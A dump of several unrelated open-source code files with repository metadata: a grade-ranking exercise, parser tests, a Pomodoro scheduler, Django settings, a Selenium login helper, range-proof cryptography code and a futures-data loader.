"""Given the names and grades for each student in a Physics class of N
students, store them in a nested list and print the name(s) of any
student(s) having the second lowest grade.
Note: If there are multiple students with the same grade, order their
names alphabetically and print each name on a new line.
Input Format
The first line contains an integer, N, the number of students.
The subsequent lines describe each student over 2N lines; the first
line contains a student's name, and the second line contains their
grade.
Constraints
2 <= N <= 5
There will always be one or more students having the second lowest
grade.
Output Format
Print the name(s) of any student(s) having the second lowest grade
in Physics; if there are multiple students, order their names
alphabetically and print each one on a new line.
"""
from operator import itemgetter
def second_lowest(*args):
arr = args[0]
lowest, higher_lowest = arr[0], ["", 100]
for student in arr:
if student[1] < higher_lowest[1]:
if student[1] < lowest[1]:
higher_lowest, lowest = lowest, student
elif student[1] == lowest[1]:
continue
else:
higher_lowest = student
return higher_lowest[1]
if __name__ == '__main__':
students = []
for _ in range(int(input())):
name = input()
score = float(input())
students.append([name, score])
second_largest_grade = second_lowest(students)
result_list = list(filter(lambda x: x[1] == second_largest_grade, students))
result_list.sort(key=itemgetter(0))
for student in result_list:
print(student[0])
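# Illustrative worked example, not part of the original script. For the input
#     5
#     Harry
#     37.21
#     Berry
#     37.21
#     Tina
#     37.2
#     Akriti
#     41
#     Harsh
#     39
# the lowest grade is 37.2 and the second lowest is 37.21, so the output is the
# alphabetically ordered names with that grade:
#     Berry
#     Harry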
|
mit
| -7,068,788,371,389,833,000
| 29.472727
| 80
| 0.666269
| false
| 3.86836
| false
| false
| false
|
duncan-r/SHIP
|
tests/test_riverunit.py
|
1
|
13279
|
from __future__ import unicode_literals
import unittest
from ship.fmp.datunits import riverunit
from ship.fmp.datunits import ROW_DATA_TYPES as rdt
from ship.datastructures.rowdatacollection import RowDataCollection
from ship.datastructures import dataobject as do
from ship.fmp.fmpunitfactory import FmpUnitFactory
class RiverUnitTests(unittest.TestCase):
'''Tests for all of the methods in the river class.
The complications involved in writing these tests show that there is probably some
    serious refactoring needed in the RiverUnit class.
Perhaps breaking down the readData() method in to smaller chunks would be a good
start. Then looking at a similar approach to the setupUnit() method.
'''
def setUp(self):
        '''Sets up everything that is needed in multiple tests to save too
much mucking about.
'''
# Example list as read from the dat file on the readFile() method in FileTools.py
self.input_contents = \
['RIVER (Culvert Exit) CH:7932 - Trimmed to BT\n',
'SECTION\n',
'1.069 Spill1 Spill2 Lat1\n',
' 15.078 1.111111 1000\n',
' 18\n',
' 5.996 37.560 0.080 1.000LEFT 291391.67 86582.61LEFT 16 \n',
' 6.936 37.197 0.035* 1.000 291391.43 86581.70 \n',
' 7.446 36.726 0.035 1.000 291391.30 86581.21 \n',
' 7.635 35.235 0.035 1.000 291391.25 86581.03 \n',
' 8.561 35.196 0.035 1.000 291391.01 86580.13 \n',
' 9.551 35.190 0.035 1.000BED 291390.75 86579.18 \n',
' 10.323 35.229 0.035 1.000 291390.55 86578.43 \n',
' 10.904 35.319 0.035 1.000 291390.40 86577.87 \n',
' 12.542 35.637 0.035 1.000 291389.98 86576.29 \n',
' 13.740 35.593 0.035 1.000 291389.67 86575.13 \n',
' 13.788 35.592 0.035 1.000 291389.66 86575.09 \n',
' 13.944 36.148 0.035 1.000 291389.62 86574.93 \n',
' 15.008 36.559 0.080* 1.000 291389.34 86573.91 \n',
' 16.355 37.542 0.080 1.000 291389.00 86572.60 \n',
' 17.424 38.518 0.080 1.000 291388.72 86571.57 \n',
' 18.449 39.037 0.080 1.000 291388.46 86570.58 \n',
' 19.416 39.146 0.080 1.000 291388.21 86569.65 \n',
' 19.420 39.133 0.080 1.000RIGHT 291388.21 86569.65RIGHT 4095 \n']
# List as exported from the setupUnit() method
self.unit_data_test = \
['RIVER (Culvert Exit) CH:7932 - Trimmed to BT',
'SECTION',
'1.069',
' 15.078 1.111111 1000',
' 18',
' 5.996 37.560 0.080 1.000LEFT 291391.67 86582.61LEFT 16 ',
' 6.936 37.197 0.035* 1.000 291391.43 86581.70 ',
' 7.446 36.726 0.035 1.000 291391.30 86581.21 ',
' 7.635 35.235 0.035 1.000 291391.25 86581.03 ',
' 8.561 35.196 0.035 1.000 291391.01 86580.13 ',
' 9.551 35.190 0.035 1.000BED 291390.75 86579.18 ',
' 10.323 35.229 0.035 1.000 291390.55 86578.43 ',
' 10.904 35.319 0.035 1.000 291390.40 86577.87 ',
' 12.542 35.637 0.035 1.000 291389.98 86576.29 ',
' 13.740 35.593 0.035 1.000 291389.67 86575.13 ',
' 13.788 35.592 0.035 1.000 291389.66 86575.09 ',
' 13.944 36.148 0.035 1.000 291389.62 86574.93 ',
' 15.008 36.559 0.080* 1.000 291389.34 86573.91 ',
' 16.355 37.542 0.080 1.000 291389.00 86572.60 ',
' 17.424 38.518 0.080 1.000 291388.72 86571.57 ',
' 18.449 39.037 0.080 1.000 291388.46 86570.58 ',
' 19.416 39.146 0.080 1.000 291388.21 86569.65 ',
' 19.420 39.133 0.080 1.000RIGHT 291388.21 86569.65RIGHT 4095 ']
# Lists for each of the data objects that are created when reading the file
self.bankmarker = ['LEFT', '', '', '', '', 'BED', '', '', '', '', '', '', '', '', '', '', '', 'RIGHT']
self.chainage = [5.996, 6.936, 7.446, 7.635, 8.561, 9.551, 10.323, 10.904,
12.542, 13.74, 13.788, 13.944, 15.008, 16.355, 17.424, 18.449, 19.416, 19.420]
self.deactivation = ['LEFT', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', 'RIGHT']
self.easting = [291391.67, 291391.43, 291391.3, 291391.25, 291391.01, 291390.75, 291390.55, 291390.4,
291389.98, 291389.67, 291389.66, 291389.62, 291389.34, 291389.0, 291388.72, 291388.46, 291388.21, 291388.21]
self.elevation = [37.56, 37.197, 36.726, 35.235, 35.196, 35.19, 35.229, 35.319,
35.637, 35.593, 35.592, 36.148, 36.559, 37.542, 38.518, 39.037, 39.146, 39.133]
self.northing = [86582.61, 86581.7, 86581.21, 86581.03, 86580.13, 86579.18, 86578.43, 86577.87,
86576.29, 86575.13, 86575.09, 86574.93, 86573.91, 86572.6, 86571.57, 86570.58, 86569.65, 86569.65]
self.panelmarker = [False, True, False, False, False, False, False, False,
False, False, False, False, True, False, False, False, False, False]
self.roughness = [0.08, 0.035, 0.035, 0.035, 0.035, 0.035, 0.035, 0.035, 0.035, 0.035, 0.035, 0.035, 0.08, 0.08, 0.08, 0.08, 0.08, 0.08]
self.rpl = [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]
self.special = ['16', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '4095']
def test_readHeadData(self):
'''Checks that the readHeadData() method works individually from the
factory load in the test_river_object_vars_from_load() test.
This should help to narrow down the problem if tests fail.
'''
        # create an unloaded river unit to just check the readHeadData() method.
r = riverunit.RiverUnit()
# Put the test data into the method
r._readHeadData(self.unit_data_test, 0)
self.assertEqual(r._name, '1.069')
self.assertEqual(r._name_ds, 'unknown')
self.assertEqual(r.head_data['comment'].value, '(Culvert Exit) CH:7932 - Trimmed to BT')
self.assertEqual(r.head_data['distance'].value, 15.078)
self.assertEqual(r.head_data['slope'].value, 1.111111)
self.assertEqual(r.head_data['density'].value, 1000)
def test_readRowData(self):
'''Checks that the readRowData() method works individually from the
factory load in the test_river_object_vars_from_load() test.
This should help to narrow down the problem if tests fail.
'''
        # create an unloaded river unit to just check the readUnitData() method.
river = riverunit.RiverUnit()
        # Put the test data into the readUnitData() method
river.readUnitData(self.unit_data_test, 0)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.CHAINAGE), self.chainage)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.ELEVATION), self.elevation)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.ROUGHNESS), self.roughness)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.PANEL_MARKER), self.panelmarker)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.RPL), self.rpl)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.BANKMARKER), self.bankmarker)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.EASTING), self.easting)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.NORTHING), self.northing)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.DEACTIVATION), self.deactivation)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.SPECIAL), self.special)
self.assertEqual(river.unit_category, 'river')
self.assertEqual(river.unit_type, 'river')
def test_getData(self):
'''Test to check the suitability of the getData() method.
'''
# Create a factory and load the river unit
ifactory = FmpUnitFactory()
i, river = ifactory.createUnitFromFile(self.input_contents, 0, 'RIVER', 1, 1)
# Setup the list that we expect to be returned from the getData() method
out_data = \
['RIVER (Culvert Exit) CH:7932 - Trimmed to BT',
'SECTION',
'1.069 Spill1 Spill2 Lat1',
' 15.078 1.1111 1000.00',
' 18',
' 5.996 37.560 0.080 1.000LEFT 291391.67 86582.61LEFT 16 ',
' 6.936 37.197 0.035* 1.000 291391.43 86581.70 ',
' 7.446 36.726 0.035 1.000 291391.30 86581.21 ',
' 7.635 35.235 0.035 1.000 291391.25 86581.03 ',
' 8.561 35.196 0.035 1.000 291391.01 86580.13 ',
' 9.551 35.190 0.035 1.000BED 291390.75 86579.18 ',
' 10.323 35.229 0.035 1.000 291390.55 86578.43 ',
' 10.904 35.319 0.035 1.000 291390.40 86577.87 ',
' 12.542 35.637 0.035 1.000 291389.98 86576.29 ',
' 13.740 35.593 0.035 1.000 291389.67 86575.13 ',
' 13.788 35.592 0.035 1.000 291389.66 86575.09 ',
' 13.944 36.148 0.035 1.000 291389.62 86574.93 ',
' 15.008 36.559 0.080* 1.000 291389.34 86573.91 ',
' 16.355 37.542 0.080 1.000 291389.00 86572.60 ',
' 17.424 38.518 0.080 1.000 291388.72 86571.57 ',
' 18.449 39.037 0.080 1.000 291388.46 86570.58 ',
' 19.416 39.146 0.080 1.000 291388.21 86569.65 ',
' 19.420 39.133 0.080 1.000RIGHT 291388.21 86569.65RIGHT 4095 ']
# Get the data and check it against our template
data = river.getData()
self.assertEquals(out_data, data, 'getData() formatting failed')
def test_addDataRow(self):
"""Test adding a new row to 'main' data."""
# Create a factory and load the river unit
ifactory = FmpUnitFactory()
i, river = ifactory.createUnitFromFile(self.input_contents, 0, 'RIVER', 1, 1)
# Add with required only args
args = {rdt.CHAINAGE: 6.0, rdt.ELEVATION: 37.2}
river.addRow(args, index=1)
row = river.row_data['main'].rowAsList(1)
testrow = [6.0, 37.2, 0.039, False, 1.0, '', 0.0, 0.0, '', '~']
self.assertListEqual(testrow, row)
# Add with all args
args = {rdt.CHAINAGE: 6.1, rdt.ELEVATION: 37.4, rdt.ROUGHNESS: 0.06,
rdt.PANEL_MARKER: True, rdt.RPL: 1.1, rdt.BANKMARKER: 'BED',
rdt.EASTING: 22.5, rdt.NORTHING: 32.5, rdt.DEACTIVATION: 'RIGHT',
rdt.SPECIAL: '16'}
river.addRow(args, index=2)
row = river.row_data['main'].rowAsList(2)
testrow = [6.1, 37.4, 0.06, True, 1.1, 'BED', 22.5, 32.5, 'RIGHT', '16']
self.assertListEqual(testrow, row)
# Check it fails without required args
args = {rdt.CHAINAGE: 6.2}
with self.assertRaises(AttributeError):
river.addRow(args, index=3)
args = {rdt.ELEVATION: 36.2}
with self.assertRaises(AttributeError):
river.addRow(args, index=3)
# Check we catch non increasing chainage
args = {rdt.CHAINAGE: 5.0, rdt.ELEVATION: 37.2}
with self.assertRaises(ValueError):
river.addRow(args, index=3)
|
mit
| -1,056,165,014,091,718,900
| 63.461165
| 144
| 0.498607
| false
| 3.155656
| true
| false
| false
|
Matt-Deacalion/Pomodoro-Calculator
|
pomodoro_calculator/__init__.py
|
1
|
6013
|
"""
A pretty command line tool to calculate the number
of Pomodori available between two points in time.
"""
__author__ = 'Matt Deacalion Stevens'
__version__ = '1.0.2'
import datetime
from itertools import cycle
class PomodoroCalculator:
"""
Calculates the number of Pomodori available in an amount of time.
"""
def __init__(self, end, start='now', short_break=5, long_break=15,
pomodoro_length=25, group_length=4, interval=False, amount=False):
self.pomodoro_length_seconds = pomodoro_length * 60
self.amount_mode = False
if start == 'now':
self.start = datetime.datetime.now()
else:
self.start = self._create_datetime(start)
if interval:
self.end = self.start + self._create_timedelta(end)
elif amount:
# set dummy end. So we don't crash.
self.end = self.start + self._create_timedelta("48:00:00")
self.amount_mode = True
self.amount = int(end)
else:
self.end = self._create_datetime(end)
# if the end time is earlier than the start,
# overlap to the next day
if self.end.time() < self.start.time():
self.end += datetime.timedelta(days=1)
self.group_length = group_length
self.short_break = short_break
self.long_break = long_break
@property
def short_break_seconds(self):
"""
Returns `short_break` in seconds.
"""
return self.short_break * 60
@property
def long_break_seconds(self):
"""
Returns `long_break` in seconds.
"""
return self.long_break * 60
@property
def total_seconds(self):
"""
Return the total time span in seconds.
"""
delta = self.end - self.start
return int(delta.total_seconds())
def _create_timedelta(self, time_string):
"""
Takes a string in the format of 'HH:MM:SS' and returns a timedelta.
"""
args = dict(zip(
['hours', 'minutes', 'seconds'],
[int(unit) for unit in time_string.split(':')],
))
return datetime.timedelta(**args)
def _create_datetime(self, time_string):
"""
Takes a string in the format of 'HH:MM:SS' and returns a datetime.
"""
args = dict(zip(
['hour', 'minute', 'second'],
[int(unit) for unit in time_string.split(':')],
))
return datetime.datetime.now().replace(**args)
def _get_item(self, offset, item_type, index):
"""
Returns one of three types of Pomodori entities. A short break, a long
break or the Pomodoro itself. The returned dict also contains the
start and end datetimes.
"""
types = {
'short-break': self.short_break_seconds,
'long-break': self.long_break_seconds,
'pomodoro': self.pomodoro_length_seconds,
}
start = self.end - datetime.timedelta(seconds=offset)
end = start + datetime.timedelta(seconds=types[item_type])
return {
'index': index,
'pomodori-index': index // 2 + 1,
'type': item_type,
'start': start,
'end': end,
'length': int((end - start).total_seconds()),
}
def pomodori_segments(self, group_length=4):
"""
Generate Pomodori along with the short and long breaks in between.
Credit: http://codereview.stackexchange.com/questions/53970
"""
        # every fourth Pomodoro precedes a long break,
# all others have short breaks following them
return cycle(
['pomodoro', 'short-break'] * (group_length - 1) + ['pomodoro', 'long-break'],
)
def pomodori_schedule(self):
"""
Returns a Pomodori schedule, which is a dict that contains a
list of Pomodori segments (Pomodoro, short break or long
break) in chronological order.
Credit: http://codereview.stackexchange.com/questions/53970
"""
available_time = self.total_seconds
segments = []
# make sure we have enough time for at least one Pomodoro
if available_time < self.pomodoro_length_seconds:
return
for i, segment_name in enumerate(self.pomodori_segments(self.group_length)):
segment = self._get_item(available_time, segment_name, i + 1)
if self.amount_mode and segment['pomodori-index'] > self.amount:
break
elif segment['length'] > available_time:
break
available_time -= segment['length']
segments.append(segment)
if segments and segments[-1]['type'].endswith('break'):
segments.pop()
work_segments = [seg for seg in segments if seg['type'] == 'pomodoro']
rest_segments = [seg for seg in segments if seg['type'].endswith('break')]
return {
'segments': segments,
'start': self.start,
'end': segments[-1]['end'],
'seconds-per-pomodoro': self.pomodoro_length_seconds,
'total-pomodori': len(work_segments),
'total-breaks': len(rest_segments),
'total-rest-time': sum(seg['length'] for seg in rest_segments),
'total-work-time': sum(seg['length'] for seg in work_segments),
}
def humanise_seconds(seconds):
"""
Takes `seconds` as an integer and returns a human readable
string, e.g. "2 hours, 5 minutes".
"""
units = []
unit_table = [('hour', 3600), ('minute', 60)]
for unit in unit_table:
quotient, seconds = divmod(seconds, unit[1])
if quotient:
units.append(
'{} {}'.format(
quotient,
unit[0] + ('s' if quotient > 1 else ''),
)
)
return ', '.join(units)
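# Illustrative usage sketch, not part of the original module; the start and end
# times below are arbitrary.
if __name__ == '__main__':
    calculator = PomodoroCalculator(end='17:30:00', start='15:00:00')
    schedule = calculator.pomodori_schedule()
    if schedule:  # None when the window is shorter than one Pomodoro
        print('{} Pomodori, {} of rest'.format(
            schedule['total-pomodori'],
            humanise_seconds(schedule['total-rest-time']),
        ))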
|
mit
| 6,045,448,055,413,695,000
| 30.317708
| 90
| 0.557126
| false
| 3.979484
| false
| false
| false
|
colour-science/colour-branding
|
utilities/colour.py
|
1
|
1033
|
import maya.cmds as cmds
import numpy as np
spectrum = np.load(
r"D:\Documents\Personal\Graphics\Colour\spectrum.npy")[:, 35:325, :]
materials = [u'mia_material_x01', u'mia_material_x02', u'mia_material_x03',
u'mia_material_x04', u'mia_material_x05', u'mia_material_x06',
u'mia_material_x07', u'mia_material_x08', u'mia_material_x09',
u'mia_material_x10', u'mia_material_x11', u'mia_material_x12', ]
samples = np.linspace(0, 1, len(materials))
for i, material in enumerate(materials):
R = np.interp(samples[i], np.linspace(0, 1, spectrum.shape[1]),
spectrum[..., 0][0])
G = np.interp(samples[i], np.linspace(0, 1, spectrum.shape[1]),
spectrum[..., 1][0])
B = np.interp(samples[i], np.linspace(0, 1, spectrum.shape[1]),
spectrum[..., 2][0])
# m = max(R, G, B)
m = 1
cmds.setAttr('{0}.diffuse'.format(material),
R / m, G / m, B / m,
type='double3')
|
bsd-3-clause
| 428,703,372,718,615,200
| 37.730769
| 77
| 0.549855
| false
| 3.074405
| false
| false
| false
|
alainrinder/quoridor.py
|
src/GridCoordinates.py
|
1
|
2281
|
#
# GridCoordinates.py
#
# @author Alain Rinder
# @date 2017.06.02
# @version 0.1
#
class GridCoordinates:
"""
Coordinates on square grid
"""
def __init__(self, col, row):
self.col = col
self.row = row
def left(self):
"""
        Return the coordinates of the square at left, even if it does not exist
"""
return GridCoordinates(self.col - 1, self.row)
def right(self):
"""
        Return the coordinates of the square at right, even if it does not exist
"""
return GridCoordinates(self.col + 1, self.row)
def top(self):
"""
        Return the coordinates of the square at top, even if it does not exist
"""
return GridCoordinates(self.col, self.row - 1)
def bottom(self):
"""
        Return the coordinates of the square at bottom, even if it does not exist
"""
return GridCoordinates(self.col, self.row + 1)
def clone(self):
"""
Return identical coordinates
"""
return GridCoordinates(self.col, self.row)
def __eq__(self, other):
"""
Override the default Equals behavior.
https://stackoverflow.com/questions/390250/elegant-ways-to-support-equivalence-equality-in-python-classes
"""
if isinstance(other, self.__class__):
#return self.__dict__ == other.__dict__
return self.col == other.col and self.row == other.row
return NotImplemented
def __ne__(self, other):
"""
Define a non-equality test.
https://stackoverflow.com/questions/390250/elegant-ways-to-support-equivalence-equality-in-python-classes
"""
if isinstance(other, self.__class__):
return not self.__eq__(other)
return NotImplemented
def __hash__(self):
"""
        Override the default hash behavior (that returns the id of the object).
https://stackoverflow.com/questions/390250/elegant-ways-to-support-equivalence-equality-in-python-classes
"""
return hash((self.col, self.row))
def __str__(self):
return "%d,%d" % (self.col, self.row)
|
mit
| 4,232,492,451,206,281,700
| 26.873418
| 113
| 0.562034
| false
| 4.147273
| false
| false
| false
|
brunofin/coinvalue
|
backend/backend/settings.py
|
1
|
2626
|
# -*- coding: utf-8 -*-
"""
Django settings for backend project.
Generated by 'django-admin startproject' using Django 1.8.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'flny4$zxzcc-sno24n6m35=xg($c^&q*mil_31v#99cbj(^iw$'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'corsheaders',
'currency',
'apiv1',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'backend.urls'
CORS_ORIGIN_ALLOW_ALL = True
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'backend.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'CET'
USE_I18N = True
USE_L10N = True
USE_TZ = True
|
gpl-3.0
| -8,834,992,552,321,021,000
| 24.504854
| 71
| 0.686976
| false
| 3.473545
| false
| false
| false
|
Coriolan8/python_traning
|
fixture/session.py
|
1
|
1518
|
__author__ = "yulya"
class SessionHelper:
def __init__(self, app):
self.app = app
    def login(self, username, password):
wd = self.app.wd
self.app.open_home_page()
wd.find_element_by_name("user").click()
wd.find_element_by_name("user").clear()
wd.find_element_by_name("user").send_keys(username)
wd.find_element_by_id("content").click()
wd.find_element_by_name("pass").click()
wd.find_element_by_name("pass").clear()
wd.find_element_by_name("pass").send_keys(password)
        wd.find_element_by_css_selector('input[type="submit"]').click()
def logout(self):
wd = self.app.wd
wd.find_element_by_link_text("Logout").click()
def is_logged_in(self):
wd = self.app.wd
        return len(wd.find_elements_by_link_text("Logout")) > 0
def is_logged_in_as(self, username):
wd = self.app.wd
return self.get_logged_user() == username
def get_logged_user(self):
wd = self.app.wd
        return wd.find_element_by_xpath("//div/div[1]/form/b").text[1:-1]
def ensure_logout(self):
wd = self.app.wd
if self.is_logged_in():
self.logout()
def ensure_login(self, username, password):
wd = self.app.wd
if self.is_logged_in():
if self.is_logged_in_as(username):
return
else:
self.logout()
self.login(username,password)
|
apache-2.0
| 7,454,230,980,946,180,000
| 28.211538
| 78
| 0.54809
| false
| 3.434389
| false
| false
| false
|
grmToolbox/grmpy
|
promotion/grmpy_tutorial/create_slides.py
|
1
|
1443
|
#!/usr/bin/env python
"""This module compiles the lecture notes."""
import argparse
import glob
import os
import shutil
import subprocess
def compile_single(is_update):
"""Compile a single lecture."""
for task in ["pdflatex", "bibtex", "pdflatex", "pdflatex"]:
cmd = [task, "main"]
subprocess.check_call(cmd)
if is_update:
shutil.copy(
"main.pdf", "../../distribution/" + os.getcwd().split("/")[-1] + ".pdf"
)
if __name__ == "__main__":
parser = argparse.ArgumentParser(" Create slides for lecture")
parser.add_argument(
"--update", action="store_true", dest="update", help="update public slides"
)
is_complete = "lectures" == os.getcwd().split("/")[-1]
is_update = parser.parse_args().update
if is_complete:
for dirname in glob.glob("0*"):
os.chdir(dirname)
compile_single(is_update)
os.chdir("../")
# I also want to have a complete deck of slides available. This is not intended
# for public distribution.
fnames = []
for fname in sorted(glob.glob("0*")):
fnames += [fname + "/main.pdf"]
cmd = "pdftk " + " ".join(fnames) + " cat output course_deck.pdf"
subprocess.check_call(cmd, shell=True)
if is_update:
shutil.copy("course_deck.pdf", "../distribution/course_deck.pdf")
else:
compile_single(is_update)
|
mit
| 3,772,548,930,021,324,300
| 27.294118
| 87
| 0.57727
| false
| 3.738342
| false
| false
| false
|
qstokkink/py-ipv8
|
ipv8/attestation/wallet/pengbaorange/boudot.py
|
1
|
4606
|
"""
Implementation of proofs for checking commitment equality and whether a commitment is a square ("Efficient Proofs that a
Committed Number Lies in an Interval" by F. Boudot).
Modified for use with range proofs ("An efficient range proof scheme." by K. Peng and F. Bao).
"""
from binascii import hexlify
from math import ceil, log
from os import urandom
from struct import pack, unpack
from ..primitives.attestation import sha256_as_int
from ..primitives.structs import ipack, iunpack
from ..primitives.value import FP2Value
def secure_randint(nmin, nmax):
normalized_range = nmax - nmin
n = int(ceil(log(normalized_range, 2) / 8.0))
rbytes_int = int(hexlify(urandom(n)), 16)
return nmin + (rbytes_int % normalized_range)
def _sipack(*n):
if len(n) > 8:
raise RuntimeError("More than 8 values specified to _sipack")
sign_byte = 0
packed = b''
for i in n:
sign_byte = sign_byte << 1
sign_byte |= 1 if i < 0 else 0
packed = ipack(-i if i < 0 else i) + packed
return pack(">B", sign_byte) + packed
def _siunpack(buf, amount):
rem = buf[1:]
nums = []
sign_byte, = unpack(">B", buf[0:1])
while rem and len(nums) < amount:
unpacked, rem = iunpack(rem)
negative = sign_byte & 0x01
sign_byte = sign_byte >> 1
nums.append(-unpacked if negative else unpacked)
return reversed(nums), rem
class EL(object):
def __init__(self, c, D, D1, D2):
self.c = c
self.D = D
self.D1 = D1
self.D2 = D2
@classmethod
def create(cls, x, r1, r2, g1, h1, g2, h2, b, bitspace, t=80, l=40): # pylint: disable=R0913,R0914
        maxrange_w = 2 ** (l + t) * b - 1
        maxrange_n = 2 ** (l + t + bitspace) * g1.mod - 1
w = secure_randint(1, maxrange_w)
n1 = secure_randint(1, maxrange_n)
n2 = secure_randint(1, maxrange_n)
W1 = g1.intpow(w) * h1.intpow(n1)
W2 = g2.intpow(w) * h2.intpow(n2)
cW1 = (W1.wp_nominator() * W1.wp_denom_inverse()).normalize()
cW2 = (W2.wp_nominator() * W2.wp_denom_inverse()).normalize()
c = sha256_as_int(str(cW1.a).encode('utf-8') + str(cW1.b).encode('utf-8')
+ str(cW2.a).encode('utf-8') + str(cW2.b).encode('utf-8'))
D = w + c * x
D1 = n1 + c * r1
D2 = n2 + c * r2
return cls(c, D, D1, D2)
def check(self, g1, h1, g2, h2, y1, y2):
cW1 = g1.intpow(self.D) * h1.intpow(self.D1) * y1.intpow(-self.c)
cW2 = g2.intpow(self.D) * h2.intpow(self.D2) * y2.intpow(-self.c)
cW1 = (cW1.wp_nominator() * cW1.wp_denom_inverse()).normalize()
cW2 = (cW2.wp_nominator() * cW2.wp_denom_inverse()).normalize()
return self.c == sha256_as_int(str(cW1.a).encode('utf-8') + str(cW1.b).encode('utf-8')
+ str(cW2.a).encode('utf-8') + str(cW2.b).encode('utf-8'))
def serialize(self):
return _sipack(self.c, self.D, self.D1, self.D2)
@classmethod
def unserialize(cls, s):
unpacked, rem = _siunpack(s, 4)
return cls(*unpacked), rem
def __eq__(self, other):
if not isinstance(other, EL):
return False
return (self.c == other.c) and (self.D == other.D) and (self.D1 == other.D1) and (self.D2 == other.D2)
def __hash__(self):
return 6976
def __str__(self):
return 'EL<%d,%d,%d,%d>' % (self.c, self.D, self.D1, self.D2)
class SQR(object):
def __init__(self, F, el):
self.F = F
self.el = el
@classmethod
def create(cls, x, r1, g, h, b, bitspace):
        r2 = secure_randint(-2 ** bitspace * g.mod + 1, 2 ** bitspace * g.mod - 1)
F = g.intpow(x) * h.intpow(r2)
r3 = r1 - r2 * x
return cls(F, EL.create(x, r2, r3, g, h, F, h, b, bitspace))
def check(self, g, h, y):
return self.el.check(g, h, self.F, h, self.F, y)
def serialize(self):
min_f = self.F.wp_compress()
return ipack(min_f.mod) + ipack(min_f.a) + ipack(min_f.b) + self.el.serialize()
@classmethod
def unserialize(cls, s):
rem = s
mod, rem = iunpack(rem)
Fa, rem = iunpack(rem)
Fb, rem = iunpack(rem)
el, rem = EL.unserialize(rem)
return cls(FP2Value(mod, Fa, Fb), el), rem
def __eq__(self, other):
if not isinstance(other, SQR):
return False
return (self.F == other.F) and (self.el == other.el)
def __hash__(self):
return 838182
def __str__(self):
return 'SQR<%s,%s>' % (str(self.F), str(self.el))
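# Illustrative sketch, not part of the original module: the signed pack/unpack
# helpers are expected to round-trip small integers (values below are made up).
if __name__ == '__main__':
    packed = _sipack(1, -2, 3)
    values, _ = _siunpack(packed, 3)
    assert list(values) == [1, -2, 3]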
|
lgpl-3.0
| 3,775,615,382,115,306,500
| 31.43662
| 115
| 0.558402
| false
| 2.839704
| false
| false
| false
|
lamter/slaveo
|
loadhistory/futures.py
|
1
|
4133
|
# coding: utf-8
import pymongo
import pandas as pd
import datetime
try:
from .newbar import NewMinuteBar, NewDayBar
except SystemError:
pass
class LoadBase(object):
"""
    Import futures historical data.
"""
def __init__(self, path, symbol):
"""
        :param path: path to the data file
        :param symbol: contract symbol
:return:
"""
self.symbol = symbol
self.client = pymongo.MongoClient("localhost", 27017)
self.data = self.load(path)
def __exit__(self, exc_type, exc_val, exc_tb):
if self.client:
            # close the connection
self.client.close()
def load(self, path):
        # get the action day; some dates are trade days (night-session issue)
# self.get_action_day(None)
raise NotImplementedError
def get_action_day(self, df):
"""
        Convert trade-day datetimes into action-day datetimes.
:return:
"""
        # the market has certainly closed by 8 p.m.
close_time = datetime.time(20)
def action_day(dt):
if dt.time() > close_time:
                # shift the date back one day
return dt - datetime.timedelta(days=1)
else:
                # unchanged
return dt
df['datetime'] = df['datetime'].apply(action_day)
return df
def to_vnpy(self):
"""
        Import into the vnpy database.
:return:
"""
raise NotImplementedError
class LoadTdxMinHis(LoadBase):
"""
    Import minute bars from TDX (Tongdaxin) historical data.
"""
def load(self, path):
df = pd.read_csv(
path,
# index_col='datetime',
names=['date', 'time', 'open', 'high', 'low', 'close', 'volume', 'position', 'settlement'],
parse_dates={'datetime': ["date", "time"]},
keep_date_col=True,
engine="python",
skip_footer=1,
encoding='gbk',
)
        # get the action day
return self.get_action_day(df)
def to_vnpy(self, dbn_1min, dbn_5min, dbn_10min):
"""
        Import into the vnpy database.
:return:
"""
self.to_vnpy_bar1(dbn_1min)
